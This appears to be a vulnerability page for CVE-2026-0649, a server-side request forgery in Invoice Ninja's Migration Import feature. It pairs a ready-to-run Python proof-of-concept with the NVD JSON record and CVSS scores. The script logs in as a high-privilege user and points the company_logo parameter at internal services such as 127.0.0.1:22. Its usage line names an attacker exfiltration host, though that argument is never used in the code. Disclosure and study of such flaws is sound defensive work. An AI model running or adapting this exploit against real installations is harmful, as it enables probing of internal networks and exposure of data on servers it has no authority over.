CVE-2026-0649

import requests import sys # CVE-2026-0649 PoC - Invoice Ninja SSRF via Migration Import # Target: Invoice Ninja <= 5.12.38 # Attack Vector: company_logo parameter in Migration Import def exploit_ssrf(target_url, internal_target, attacker_server): """ Exploit SSRF vulnerability in Invoice Ninja Migration Import target_url: Base URL of Invoice Ninja instance internal_target: Internal service to target (e.g., 'http://127.0.0.1:22') attacker_server: Attacker's server to receive internal response """ # Login to get session login_url = f"{target_url}/login" session = requests.Session() # Credentials for high-privilege user credentials = { 'email': '[email protected]', 'password': 'admin_password' } # Login request login_response = session.post(login_url, data=credentials) if login_response.status_code != 200: print("[-] Login failed") return False # Navigate to Migration Import functionality import_url = f"{target_url}/settings/import_export" # Prepare SSRF payload via company_logo parameter # The vulnerable parameter accepts URL for company logo ssrf_payload = { 'company_logo': internal_target, # e.g., http://127.0.0.1:8080 'import_type': 'json', 'data_file': open('malicious_data.json', 'rb') } # Send malicious request try: response = session.post(import_url, files=ssrf_payload, timeout=10) print(f"[*] Request sent to: {internal_target}") print(f"[*] Response status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[*] SSRF triggered - internal request made to: {internal_target}") return True if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2026-0649_poc.py <target_url> <internal_target> <attacker_server>") print("Example: python cve-2026-0649_poc.py http://vulnerable-invoice-ninja.com http://127.0.0.1:22 http://attacker.com/exfil") sys.exit(1) target = sys.argv[1] internal = sys.argv[2] attacker = sys.argv[3] exploit_ssrf(target, internal, attacker)

{"cve": {"id": "CVE-2026-0649", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:07.547", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in invoiceninja up to 5.12.38. The affected element is the function copy of the file /app/Jobs/Util/Import.php of the component Migration Import. The manipulation of the argument company_logo leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://note-hxlab.wetolink.com/share/fWqEpn5fX4rH", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.339720", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.339720", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.721323", "source": "[email protected]"}]}}